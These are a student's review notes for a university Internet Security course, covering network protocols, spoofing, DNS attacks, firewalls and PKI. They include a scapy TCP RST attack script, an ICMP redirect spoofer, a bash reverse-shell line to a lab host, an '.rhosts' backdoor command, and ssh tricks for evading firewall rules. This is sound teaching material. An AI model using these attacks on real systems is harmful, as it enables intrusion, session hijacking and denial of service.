CSE-644: Internet Security (Final Review)
04 May 2020- Exam date/time (Spring 2020)
- Sniff/spoof
- ARP: Address Resolution Protocol
- IP: Internet Protocol
- TCP: Transmission Control Protocol
- DNS: Domain Name System
- VPN: Virtual Private Network
- Linux Firewall
- PKI (Public Key Infrastructure)
- TLS: Transport Layer Security
- Secret-key Encryption
- One-way Hash Function
- BGP: Border Gateway Protocol
Exam date/time (Spring 2020)
May 05, 3-5 PM (online exam due to coronavirus!)
Sniff/spoof
- Promiscuous mode: NIC passes every frame to the kernel. Usually frames that have matching MAC address are passed to the kernel. Other packets will be dropped by hardware.
- Monitor mode: the “promiscuous mode” for wireless NICs. Because wireless transmission works on different channels, this requires special hardware. Sometimes it is impossible to capture all traffic in the physical world.
- BSD Packet Filter (BPF)
- A filtering mechanism implemented inside the kernel.
- We need to implement this filter in kernel space because it is costly to pass them from kernel to user space.
- BPF Syntax
- Packet sniffing/spoofing
- Sniff: raw socket,
pcap
,scapy
- Spoof: raw socket,
scapy
- Sniff: raw socket,
- Endianness
- Big endian: most significant byte first (e.g. Network, IBM PowerPC)
- Small endian: least significant byte first (e.g. x86, Qualcomm Hexagon)
ARP: Address Resolution Protocol
-
Purpose of ARP protocol: find the corresponding MAC address of an IP address inside a local network.
-
Three ways to conduct ARP cache poisoning
- Identities: M (attacker), A (victim), B
-
Goal: on machine A, B’s IP address is associated with M’s MAC address.
-
Using ARP request
-
Spoof a tampered request on behalf of B to A (as if B is requesting A’s MAC address)
-
ARP request
OPER=1 SHA=M's MAC SPA=B's IP TPA=A's IP
-
-
Using ARP reply
-
ARP reply (as if B is replying A’s ARP request)
OPER=2 SHA=M's MAC SPA=B's IP THA=A's MAC TPA=A's IP
-
-
Using ARP gratuitous message
-
Gratuitous message: a broadcast ARP message informing address changes to the entire network.
-
Characteristics:
OPER=1
,SPA=TPA
,THA=BROADCAST
-
ARP packet
OPER=1 SHA=M's MAC SPA=B's IP THA=BROADCAST TPA=B's IP
-
-
We cannot use ARP to attack remote computers because ARP packets will not be routed on the Internet.
IP: Internet Protocol
- IP Header
- Version: 4
- Internet Header Length (IHL): length of the IP header, counted in 4 bytes. Minimum is 5 (the minimal IP header size is 20).
- Total length: the length of the entire packet, including header and data. Since it has 16 bits, the maximum size of an IP packet is \(2^{16} - 1 = 65535\) bytes.
- Identification: To identify the group of fragments of a single IP datagram.
- Flags:
- Bit 0: Reserved, must be zero
- Bit 1: Don’t fragment (DF) - can be used for path MTU discovery
- Bit 2: More fragments (MF)
- Fragment offset: the offset of this packet’s data counted in 8 bytes.
- Time to live: helps prevent IP datagram for persisting on an Internet by limiting a packet’s life time.
- Protocol: specifies the protocol of the payload.
-
IP Address
- CIDR Notation
- 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0, which has 24 leading 1-bits.
- the IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from 192.168.100.0 to 192.168.103.255.
- 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.
- CIDR Notation
-
IP fragmentation
-
The fragmented packets will have the same ID.
-
All packets except the last one will have MF flag set.
-
Sample fragmented IP traffic
- Total size of IP payload: UDPHDR(8) + PAYLOAD(10000)=10008
- The length of each packet: ETHERHDR(14) + IP
- Therefore, each packet of length 1514 contains 1500 bytes of IP data, which means 1480 bytes of payload. The packet of length 1162 contains \(1162-14-20=1128\) bytes of payload. The total size of payload is \(1480 \times 6 + 1128 = 10008\).
No. Source Destination Protocol Length Info 5 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=0, ID=0001) [Reassembled in #11]” 6 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=1480, ID=0001) [Reassembled in #11]” 7 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=2960, ID=0001) [Reassembled in #11]” 8 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=4440, ID=0001) [Reassembled in #11]” 9 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=5920, ID=0001) [Reassembled in #11]” 10 192.168.0.100 192.168.0.1 IPv4 1514 “Fragmented IP protocol (proto=UDP 17, off=7400, ID=0001) [Reassembled in #11]” 11 192.168.0.100 192.168.0.1 UDP 1162 50000 -> 50000 Len=10000
-
-
DOS attack with IP fragmentation: send a lot of packets with MF flag set and different ID to try to stall the victim’s memory. Unfortunately, this problem has been fixed and it is not working.
-
ICMP redirect attack
-
An ICMP redirect is an error message sent by a router to the sender of an IP packet. Redirects are used when a router believes a packet is being routed sub optimally and it would like to inform the sending host that it should forward subsequent packets to that same destination through a different gateway.
-
By default, Linux do not process redirect packets. To activate it, one needs to call:
[02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1 net.ipv4.conf.all.accept_redirects = 1
-
The construction of an ICMP redirect attack packet
- We spoof a fake ICMP message on behalf of the router of the network to the victim, informing him that packets sending to
10.0.0.1
should be routed to10.0.2.5
.
from scapy.all import * ip1 = IP(src='10.0.2.1', dst='10.0.2.6') icmp = ICMP(type=5, code=1,gw='10.0.2.5') ip2 = IP(src='10.0.2.6', dst='10.0.0.1') udp = UDP(dport=9090) packet = ip1/icmp/ip2/udp send(packet)
- We spoof a fake ICMP message on behalf of the router of the network to the victim, informing him that packets sending to
-
If the destination IP is a local machine, this may not work because those packets will not be routed.
-
-
UDP: User Datagram Protocol
- UDP chekcsum is not always verified
TCP: Transmission Control Protocol
- TCP Header
- Data offset: helps compute the offset of the start of actual data. This is counted in four bytes. The minimal size of TCP header is 20, so the minimum value of this field is 5.
- Flags
- SYN: synchronize sequence numbers. This is during three-way handshake.
- ACK: indicates the ACK field is significant. This should be set after the handshake.
- RST: reset the connection. Basically, terminates the connection immediately.
- Window size: the size of receive window. This field is used for flow control.
- Urgent pointer: if the urgent flag is set, this marks the offset from sequence number the last byte of urgent data. Usually, urgent data has special handlers.
-
TCP Checksum computation
To compute TCP checksum, we need to construct a packet with pseudo-header and TCP header+data.
- The segment length is the total length of TCP header and payload.
- The original TCP header and payload is appended after this pseudo-header. Note that the checksum field in the TCP header should be initialized with zero!
-
The checksum is the IP checksum of the concatenated result. After computing checksum, fill the value back to the TCP header.
-
Sample TCP traffic
No. Source Destination Protocol Length Info 58 192.168.0.111 192.168.0.100 TCP 78 65117 > 9090 [SYN] Seq=0 Win=65535 Len=0 59 192.168.0.100 192.168.0.111 TCP 74 “9090 > 65117 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0” 60 192.168.0.111 192.168.0.100 TCP 66 65117 > 9090 [ACK] Seq=1 Ack=1 Win=131712 Len=0 93 192.168.0.111 192.168.0.100 TCP 87 “65117 > 9090 [PSH, ACK] Seq=1 Ack=1 Win=131712 Len=21 “ 94 192.168.0.100 192.168.0.111 TCP 66 9090 > 65117 [ACK] Seq=1 Ack=22 Win=65152 Len=0 138 192.168.0.100 192.168.0.111 TCP 101 “9090 > 65117 [PSH, ACK] Seq=1 Ack=22 Win=65152 Len=35 “ 139 192.168.0.111 192.168.0.100 TCP 66 65117 > 9090 [ACK] Seq=22 Ack=36 Win=131712 Len=0 145 192.168.0.111 192.168.0.100 TCP 77 “65117 > 9090 [PSH, ACK] Seq=22 Ack=36 Win=131712 Len=11 “ 146 192.168.0.100 192.168.0.111 TCP 66 9090 > 65117 [ACK] Seq=36 Ack=33 Win=65152 Len=0 150 192.168.0.111 192.168.0.100 TCP 66 “65117 > 9090 [FIN, ACK] Seq=33 Ack=36 Win=131712 Len=0 “ 151 192.168.0.111 192.168.0.100 TCP 60 “65117 > 9090 [RST, ACK] Seq=34 Ack=36 Win=131712 Len=0” -
SEQ and ACK numbers
-
Suppose A is sending a packet to B. Think of SEQ number as a pointer to the last unsent byte on A, think of the ACK number as a pointer to the next expected byte from B. For example, when A sends a packet with SEQ=0, LEN=10, we know that the ACK from B will be 10. From A, we have sent
buf[0]
tobuf[9]
, which are all unsent. And B is expectingbuf[10]
. -
Sample traffic
(Packet 1: A -> B) SEQ=x1 ACK=y1 LEN=z1 (Packet 2: B -> A) SEQ=y1 ACK=x1+z1 LEN=0 (ACK Packet) (Packet 3: B -> A) SEQ=y1 ACK=x1+z1 LEN=z2 (Packet 4: A -> B) SEQ=x1+z1 ACK=y1+z2 LEN=0 (ACK Packet)
-
-
Three-way handshake: how a TCP connection starts
- Client sends SYN packet with initial SEQ
- Server responds with SYN+ACK packet with initial SEQ and incremented ACK number.
- Client responds incremented ACK .
- Despite message length being zero, the ACK number is incremented by one!
(Packet 1: A -> B) SEQ=x1 LEN=0 (SYN) (Packet 2: B -> A) SEQ=y1 ACK=x1+1 LEN=0 (SYN+ACK) (Packet 3: B -> A) SEQ=x1+1 ACK=y1+1 LEN=0 (ACK)
- SYN Flooding Attack
- Each server has a connection queue to manage connections. SYN flooding is to spoof a large amount of SYN packets to the server, which fills the server’s connection queue with malicious connections. If the connection queue is full, the server will no longer be able to start new connections.
- Countermeasure: SYN Cookie
- When the connection queue is filled, the server will encode some information about the connection (e.g. time, client’s IP, port number) into the sequence number field and send reply to the client. Then, the connection is not stored anymore, which prevents the DOS attack.
- If the packet is from a malicious attacker, he will not receive this packet back (because the source IP address is not his!)
- If the client is indeed interested in talking to the server, it will send a ACK packet back to the server. The server checks this packet and see if it has the correct ACK number, which is encoded with the client’s information. If so, the connection is established.
-
TCP RST Attack
-
Local attack: sniff the TCP packets on LAN and spoof RST packets with correct SEQ and ACK numbers.
-
Remote attack: spoof RST packets with random SEQ and ACK numbers.
-
Python attack code
from scapy.all import * def rst_attack(pkt): if 'R' in pkt[TCP].flags: return baseSeq = pkt[TCP].ack baseAck = pkt[TCP].seq ip = IP(src=pkt[IP].dst, dst=pkt[IP].src) tcp = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags='AR', seq=baseSeq, ack=baseAck+1) outPacket = ip/tcp send(outPacket) sniff(filter='dst host 10.0.2.7 and tcp portrange 23-23', prn=rst_attack)
- Switch src IP and dst IP
- Flags=AR
- Fill the correct SEQ and ACK numbers
-
-
TCP Session Hijacking
-
Sample attack
-
The wireshark capture of the last packet
17 10.0.2.6 10.0.2.7 TCP 66 58520 → 23 [ACK] Seq=1911510874 Ack=145612526 Win=237 Len=0
-
Spoof a packet
SRC IP=10.0.2.7 DST IP=10.0.2.6 SEQ=145612526 ACK=1911510874
-
-
It is better to target ACK packets with LEN=0! In this case, we don’t need to compete with the actual sender on the network.
-
Why does the
telnet
session freeze?If you hijack the session by spoofing a packet from A to B, machine B will be expecting a new ACK number. However, all message from B to A will be dropped by A because A will consider the ACK number invalid. Therefore, A does not know the new ACK number. All message from A to B will be dropped because the SEQ number is invalid.
-
Setting up a reverse shell
/bin/bash -i > /dev/tcp/10.0.2.5/9090 0<&1 2>&1
> /dev/tcp/10.0.2.5/9090
redirectsstdout
(file descriptor 1) to a TCP port.0<&1
redirectsstdin
(file descriptor 0) tostdout
.2>&1
redirectsstderr
(file descriptor 2) tostdout
.&
means file descriptor reference.
-
-
Mitnick attack
- Background: there is a protected machine “X-Terminal” and a trusted server. The remote shell program is the legacy
rsh
, which you can set a IP-address based authentication to allow automatic login for a certain IP address. It is stored in a file named.rhosts
. In this case, the IP address of the trusted server is added into this file, which means the trusted server can login to X-Terminal without any authentication. Our goal is to set up a backdoor on X-Terminal so that we can also login to X-Terminal without authentication. - The attack
-
SYN flood the trusted server
We need to conduct a DOS attack on the trusted server first. In the lab scenario, we simply disconnect the trusted server. However, since the trusted server should still be able to respond ARP requests because we only attack the TCP queue, we should add a static ARP entry for the trusted server on the X-Terminal.
-
Spoof a SYN packet on behalf of the trusted server to X-Terminal
In this step, we try to establish a connection to the X-Terminal.
-
Spoof a ACK packet to X-Terminal
After step 2, the X-Terminal will send a SYN+ACK message. However, since the source IP address is trusted server’s, we will not be able to receive the packet. Fortunately, the trusted server has been blocked and will not respond either. This grants us time to hijack the connection. To spoof a correct ACK packet, we need to know the ACK number in X-Terminal’s SYN+ACK response. In reality, Mitnick acquired the pattern of ACK numbers on the X-server.
-
Spoof a command to install the backdoor
Because the IP of trusted server has already been put in
.rhosts
, we are able to send and execute commands on the X-Terminal without any further authentication. We simply just add our IP address into.rhosts
and the attack is done. In reality, we can doecho ++ >> .rhosts
to allow arbitrary IP address. This will hide attacker’s identity.
-
- Background: there is a protected machine “X-Terminal” and a trusted server. The remote shell program is the legacy
DNS: Domain Name System
-
DNS server listens to UDP port 53
-
The hierarchical structure of DNS
- Root domain -> top level domains -> second-level domains
- A DNS query goes step by step from higher levels to lower levels, until a definitive answer is found.
- DNS hierarchy are separated into different zones, where each zone is a configuration subspace of DNS domain names.
- DNS Header
- A complete DNS packet: IPHDR+UDPHDR+DNSHDR
- QDCOUNT: number of question records
- QNCOUNT: number of answer records
- NSCOUNT: number of authority records
- ARCOUNT: number of additional records
- QR flag: specifies if the packet is a query (0) or response (1)
- AA flag: specifies if the answer is authoritative or not. If the answer is authoritative, it comes from a name server that can provide a definitive and authoritative answer for domain name in question section. For example, if I query
www.google.com
froma.gtlb-servers.net
, the response will not have AA flag because the domain name is not managed by this server. However, if I querywww.google.com
from one of Google’s name servers (e.g.ns1.google.com
), the answer will have AA flag. - RD flag: specifies if recursion is desired. If the query is recursive, the DNS server will iteratively search for the final answer to a DNS query. Whether this is available or not depends on the DNS server’s configuration.
-
DNS Records
-
There are three types of DNS records: question record, answer record and authority record.
-
Sample
dig
result (querywww.google.com
from root servers)- Record type: NS (authority), A (IP address)
- 172800: TTL in terms of seconds. Specifies how long this record should exist in DNS cache.
; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> www.google.com @a.root-servers.net -4 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63490 ;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 27 ;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1472 ;; QUESTION SECTION: ;www.google.com. IN A ;; AUTHORITY SECTION: com. 172800 IN NS a.gtld-servers.net. com. 172800 IN NS b.gtld-servers.net. com. 172800 IN NS c.gtld-servers.net. com. 172800 IN NS d.gtld-servers.net. com. 172800 IN NS e.gtld-servers.net. com. 172800 IN NS f.gtld-servers.net. com. 172800 IN NS g.gtld-servers.net. com. 172800 IN NS h.gtld-servers.net. com. 172800 IN NS i.gtld-servers.net. com. 172800 IN NS j.gtld-servers.net. com. 172800 IN NS k.gtld-servers.net. com. 172800 IN NS l.gtld-servers.net. com. 172800 IN NS m.gtld-servers.net. ;; ADDITIONAL SECTION: a.gtld-servers.net. 172800 IN A 192.5.6.30 b.gtld-servers.net. 172800 IN A 192.33.14.30 c.gtld-servers.net. 172800 IN A 192.26.92.30 d.gtld-servers.net. 172800 IN A 192.31.80.30 e.gtld-servers.net. 172800 IN A 192.12.94.30 f.gtld-servers.net. 172800 IN A 192.35.51.30 g.gtld-servers.net. 172800 IN A 192.42.93.30 h.gtld-servers.net. 172800 IN A 192.54.112.30 i.gtld-servers.net. 172800 IN A 192.43.172.30 j.gtld-servers.net. 172800 IN A 192.48.79.30 k.gtld-servers.net. 172800 IN A 192.52.178.30 l.gtld-servers.net. 172800 IN A 192.41.162.30 m.gtld-servers.net. 172800 IN A 192.55.83.30 ;; Query time: 26 msec ;; SERVER: 198.41.0.4#53(198.41.0.4) ;; WHEN: Sat May 02 18:14:53 EDT 2020 ;; MSG SIZE rcvd: 839
-
-
Local DNS attack
-
Providing a authoritative answer for a specific domain
In the lab scenario, we would like to specify an authoritative domain name server for a certain domain. Normally, we need to purchase a domain to do so. However, there is a way to avoid the cost. Suppose there are three machines A (User), B (Local DNS Server) and C (Authoritative Name Server). The following configuration allows A to view C as the domain name’s authoritative name server.
- On machine A, set the DNS server to be B.
- On machine B, use a “forward” record inside
BIND9
zone file to forward the DNS requests of a specific zone to C. - Set up an authoritative zone on C’s
BIND9
zone file.
- The attack
- The attacker sniffs DNS requests from A.
- Upon receiving a DNS request, the attacker construct a DNS reply. He changes the authority section of the domain name to his own DNS server and then spoof the packet back.
- We choose to change the authority section because any further DNS query on this domain will go to the attacker’s DNS server.
-
-
Remote DNS attack (Kaminsky attack)
- Challenges
- We do not know when the victim will send out DNS query.
- If the reply is cached by the victim, it will take a long time before the attacker can try again.
- We do not know the DNS transaction number and UDP source port.
- The attack
- The attacker queries the victim for a random name in
example.com
(e.g.abcdef.example.com
). Because the victim does not have the answer for this domain name, it will send out a DNS query. - While the victim is waiting for reply, the attacker spoof DNS replies with random transaction number and UDP destination port number. The authority section is replaced by the attacker’s DNS server, the answer section contains a IP resolution for the random domain name. If one of the packets have the correct combination, the attack will be successful, and the name server for
example.com
will become the attacker’s name server. - If the DNS response fail, the attacker repeats from step 1. Because the new random name is not in victim’s DNS cache, the victim will send new DNS queries.
- The attacker queries the victim for a random name in
- Challenges
- DNS Rebinding attack
- Background: the attack is used to defeat the Same Origin Policy (SOP) of web browsers. Suppose there are two machines A, B behind a firewall, and A is invisible from outside. Suppose B’s user browse attacker’s website, the attacker normally does not have access of A, because the SOP only allows AJAX code to interact with the website’s domain. The DNS rebinding attack works by rebinding the IP address of attacker’s domain to A’s IP address. When the AJAX code trigger requests, it actually talks to machine A. This allows the attacker to manipulate the invisible machine behind a firewall.
- The attack
- At the beginning, the attacker’s domain name is mapped to its real IP address. The TTL of DNS response is set to be very small (e.g. 2 seconds) for the rebinding attack to work
- The user of machine B browse the attacker’s website. The malicious JavaScript code begins to run on B.
- After a while, the AJAX code on the page sends a request to attacker’s website. Because the DNS cache has already expired, B will query the IP address again from attacker’s name server. The answer of attacker’s name server now is A’s IP address. Therefore, the request is sent to A.
-
Countermeasure
- DNSSEC: protect DNS queries with digital signatures.
-
Amplification attack
One can spoof DNS queries (which are small) with the victim’s source IP. This will trigger a large amount of DNS responses (which are large) to the victim.
VPN: Virtual Private Network
- This is the architecture of a TUN/TAP based VPN. The mechanism of some IPsec based VPN is a little bit different.
-
TUN/TAP Interface: they serve as a way to extract packets from the kernel space. TUN/TAP interfaces have two ends: the network end and file system end. In the routing table, we can route packets to the network end of TUN/TAP interface. Then, the user program can read packets out from TUN/TAP’s file system end.
-
How VPN works
Suppose there are three computers A (VPN user), B (VPN server) and C (machine behind firewall).
- A’s IP: 10.0.2.5
- B’s IP: 10.0.2.6, 192.168.60.1 (two NICs)
- C’s IP: 192.168.60.101
- A TUN interface is created on A with IP address 192.168.50.5. The 192.168.50.0/24 subnet is reserved for TUN interfaces. In A’s routing table, all traffic that goes to 192.168.50.0/24 is routed to
tun0
(usually this is set automatically when you assign IP address to a TUN interface). All traffic that goes to 192.168.0.60/24 is routed totun0
as well. - A VPN program on A reads packets out from
tun0
and send them to the VPN server via the Internet. (The src IP of packets coming out fromtun0
is 192.168.50.5, because they are routed and emitted bytun0
.) - The VPN server program on B receives the packet. On B, it also has a TUN interface called
tun1
with IP address 192.168.50.1. The VPN program will write packets intotun1
. The OS will route packets to the NIC with IP address 192.168.60.1, and C will receive the packet. - For packets to come back, on C, the 192.168.50.0/24 subnet is routed to 192.168.60.1.
-
Corresponding VPN setup script
-
Machine A
sudo ifconfig tun0 192.168.50.5/24 up sudo route add -net 192.168.60.0/24 tun0
-
Machine B Remember to turn on IP forwarding!
sudo ifconfig tun1 192.168.50.1/24 up sudo sysctl net.ipv4.ip_forward=1
-
Machine C
sudo route add -net 192.168.50.0/24 gw 192.168.60.1
-
-
Maintaining packet boundary
When packets are sent from A to B, if we are using UDP, the
read
system call will read the number of bytes of UDP payload, and the packet boundary is automatically maintained. However, if we are using TCP, the number of bytes read by the system call is undermined: it could be less than, equal to or larger than the actual packet size. Therefore, special measure needs to be taken to maintain packet boundary when the protocol between A and B is TCP. For example, we can prepend a header that contains packet size before each packet.
Linux Firewall
-
Three types of firewall
- Packet filter (stateless)
- Stateful firewall (able to monitor connections and other persistent information)
- Application/proxy firewall
-
The
netfilter
interface in Linux-
The
netfilter
interface provided by Linux kernel allows one to insert high-performance firewall modules into Linux kernel. -
The
Makefile
to compile kernel modules (assume the kernel module iskmod.c
)obj-m+=kmod.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
-
Operations of
netfilter
NF_ACCEPT
: let the packet flow through the stackNF_DROP
: discard the packetNF_QUEUE
: put the packet to the user space vianf_queue
facility.NF_STOLEN
: informnetfilter
framework to forget the packet. The further processing of this packet is passed on to the custom firewall module.NF_REPEAT
: reqeustnetfilter
to call this module again.
-
netfilter
hooks- SNAT is performed at
POST_ROUTING
- SNAT is performed at
-
Sample firewall module based on
netfilter
#include <linux/kernel.h> #include <linux/module.h> #include <linux/netfilter.h> #include <linux/netfilter_ipv4.h> #include <linux/ip.h> #include <linux/tcp.h> static struct nf_hook_ops telnetFilterHook; unsigned int telnetFilter(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) { struct iphdr *iph; struct tcphdr *tcph; iph = ip_hdr(skb); tcph = (void *)iph+iph->ihl*4; if (iph->protocol == IPPROTO_TCP && tcph->dest == htons(23)) { return NF_DROP; } else { return NF_ACCEPT; } } int setUpFilter(void) { telnetFilterHook.hook = telnetFilter; telnetFilterHook.hooknum = NF_INET_POST_ROUTING; telnetFilterHook.pf = PF_INET; telnetFilterHook.priority = NF_IP_PRI_FIRST; // Register the hook. nf_register_hook(&telnetFilterHook); return 0; } void removeFilter(void) { nf_unregister_hook(&telnetFilterHook); } module_init(setUpFilter); module_exit(removeFilter); MODULE_LICENSE("GPL");
-
-
iptables
firewall-
iptables
is a frontend ofnetfilter
which provides a lot of powerful functionalities. -
The packet traversal graph of
iptables
-
iptables
Tables and ChainsTable Chain Functionality filter INPUT
FORWARD
OUTPUTPacket filtering nat PREROUTING
INPUT
OUTPUT
POSTROUTINGModifying src/dst network address. mangle PREROUTING
INPUT
FORWARD
OUTPUT
POSTROUTINGPacket content modification. -
Examples
Assume A’s IP is 10.0.2.5; B’s IP is 10.0.2.6.
-
Incrementing all incoming packets’ TTL by 5
sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 5
-
Prevent A from doing
telnet
to Bsudo iptables -t filter -A OUTPUT -p tcp --dport 23 -d 10.0.2.6 -j DROP
-
Prevent A from receiving
telnet
requests from Bsudo iptables -t filter -A INPUT -p tcp --dport 23 -s 10.0.2.6 -j DROP
-
Prevent A from visiting an external website Assume the IP address of the website is 157.240.18.35.
sudo iptables -t filter -A OUTPUT -p tcp -m multiport --dports 80,443 -d 157.240.18.35 -j DROP
-
-
Evading packet filtering
-
Evading egress filtering
Suppose rule 2 in the previous bullet point is active. We can
ssh
into machine B and forward port 23 to something else.ssh -L 8000:localhost:23 seed@10.0.2.6
Now, we can
telnet
to localhost’s port 8000 in order totelnet
to machine B.telnet localhost 8000
-
Browsing another website
Suppose rule 4 in the previous bullet point is active. In order to browse the website, we can
ssh
to machine B with dynamic port forwarding.ssh -D 8000 -C seed@10.0.2.6
In order to browse the blocked website, we can setup a SOCKS proxy in Firefox at 127.0.0.1:8000.
-
Evading ingress filtering Suppose rule 3 in the previous bullet point is active. From machine A, we can
ssh
to machine B with remote port forwarding:ssh -R 8000:localhost:23 seed@10.0.2.6
Now, on machine B, the user can telnet to his own 127.0.0.1:8000, and it will eventually reach machine A.
-
-
Connection based rules
Suppose we want to limit the number of TCP connections from a specific IP address. We can run:
sudo iptables -A INPUT -p tcp --syn --dport 80 -s 10.0.2.5 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with-tcp-reset
This limits the amount of connections from 10.0.2.5 to 1.
-
-
NAT: Network Address Translation
-
NAT is used to mitigate the lack of IPv4 address.
-
DNAT (Destination NAT): used to publish a service located inside a private network. It’s called DNAT because the router effectively changes the destination IP address of arrived packets (to the mapped machine’s address). DNAT is also called port forwarding.
-
SNAT (Source NAT): used to allow machines inside a private network to talk with outside servers. It’s called SNAT because the router effectively changes the source IP address of arrived packets (to its own address).
-
SNAT Example
Role VM IP A 10.0.2.5 G (Gateway) 10.0.2.6, 192.168.60.1 B 192.168.60.101 Without SNAT, B cannot reach A. To set up a SNAT, on G, we run:
sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o enp0s3 -j SNAT --to-source 10.0.2.6
Basically, the source address will be changed to 10.0.2.6. On the gateway, a specific port is associated with machine A so that when the packet comes back, it will be forwarded to A instead of other machines.
-
DNAT Example
Suppose I want to
telnet
from A to B. Without DNAT, A cannot reach B. We can set up a DNAT to forward B’s port 23 to G’s port 8000:sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 192.168.60.101:23
-
Load balancing with DNAT
Another purpose of DNAT is to achieve load balancing, because a port on G can be mapped to multiple destinations. For example, we can set up a hypothetical load balancing application that forwards packets to different ports of B:
sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability .50 -j DNAT --to-destination 192.168.60.101:9000 sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability 1.0 -j DNAT --to-destination 192.168.60.101:9001
The second rule has probability 1.0 because the actual probability is the product of the current probability and probabilities left (unassigned). Therefore, each rule has a 50% chance.
-
PKI (Public Key Infrastructure)
-
Public-key cryptography
Briefly speaking, public-key cryptographic algorithms have a public key
p
and private keye
. Anyone can encrypt data withp
, but only the holder ofe
can decrypt. Conversely, the holder ofe
can encrypt a message withe
, and anyone that hasp
can decrypt the message. This implies that:- Encryption and decryption are one-way: without corresponding keys, given ciphertext, it is difficult to get the plaintext; given plaintext, it is difficult to get the ciphertext.
- Anyone can transfer information to the holder of
e
securely. Only the holder ofe
can decrypt the message. - The holder of
e
can prove a message is indeed sent from him by sending the message and another version of the message encrypted withe
. The receiver can verify the author by comparing the decrypted message and the actual message. (This is known as digital signature.)
-
Diffie-Hellman key exchange
DH allows two parties to exchange a secret key securely. Suppose there are two sides A and B, then:
- A and B agrees on a big positive prime \(g\) and a smaller positive prime \(p\).
- A picks a random positive integer \(x < p\) and sends \(g^x\mathbin{\mathrm{mod}}p\) to B.
- B picks a random positive integer \(y < p\) and sends \(g^y\mathbin{\mathrm{mod}}p\) to A.
- Both A and B can compute the shared secret by calculating \(K=g^{xy}\mathbin{\mathrm{mod}}p\).
An outsider will not be able to get \(K\) because he does not know \(x\) or \(y\).
-
Man-In-The-Middle (MITM) Attack
Despite the fact that the combination of public-key cryptography and DH seems to be secure, it is susceptible to MITM attacks. That is to say, an attacker C can talk with A and B at the same time, tricking each party into thinking that C is the other side. In this way, C can steal the secret. The PKI is intended to defeat MITM attack.
-
An example A and B were to talk directly. However, M can intercept their traffic, which makes the connections looks like A⟷M⟷B.
- M intercepts the public key sent from A to B. Now he sends his own public key to B.
- When B wants to send something to A, B will encrypt the message with M’s public key.
- M can decrypt the message and encrypt it again with A’s public key.
- M send the message to A.
Both parties will not be able to spot M, and their traffic is completely compromised.
-
-
How PKI defeats MITM attack
- Two key components in PKI
- Digital Certificates: It is a document that proves the owner ship of the public key mentioned in the certificate. Digital certificates are signed by CAs who certify the owner ship of their contained public keys.
- Certificate Authority (CA): they are responsible for verifying the identity of users and providing them with signed digital certificates.
- The certificates (public keys) of CAs are already installed in operating systems and browsers. This is the root of trust.
- If the attacker…
- Creates a fake certificate: the certificate cannot be signed by a trusted CA. Therefore, it will not be accepted by browsers.
- Forwards the real certificate: the validation will pass in browser. However, the session key will be encrypted with the real certificate’s public key afterwards. The attacker will be unable to get the session key, and the actual traffic stays encrypted.
- Uses his own certificate: the common name of this own certificate will differ from the attacked website. Therefore, it will not be accepted by browsers.
- Two key components in PKI
-
How to create a self-signed CA and issue certificates
-
Generate public/private key pairs for the CA
openssl req -x509 -newkey ras:4096 -sha256 -keyout key.pem -out cert.pem
-
Generate public/private key pairs for a server
openssl genrsa -aes128 -out server_key.pem 2048
-
Generate certificate signing request
openssl req -new -key server_key.pem -out server.csr -sha256
-
Sign the certificate on CA side
openssl ca -in server.csr -out server_cert.pem -md sha256 -cert cert.pem -keyfile key.pem
-
Deploy the certificate on the server side Put the private key into the certificate
cp server_key.pem server_deploy.pem cat server_cert.pem >> server_deploy.pem
-
Test the certificate with
openssl
test serveropenssl s_server -cert server_deploy.pem -accept 4433 -www
-
TLS: Transport Layer Security
- The goal of TLS is to guarantee:
- Confidentiality: no other parties can see the actual content of communication.
- Integrity: if data are tampered by others, the channel should be able to detect.
- Authentication: at least one end of the channel should be verified.
-
TLS Programming
-
Sample client
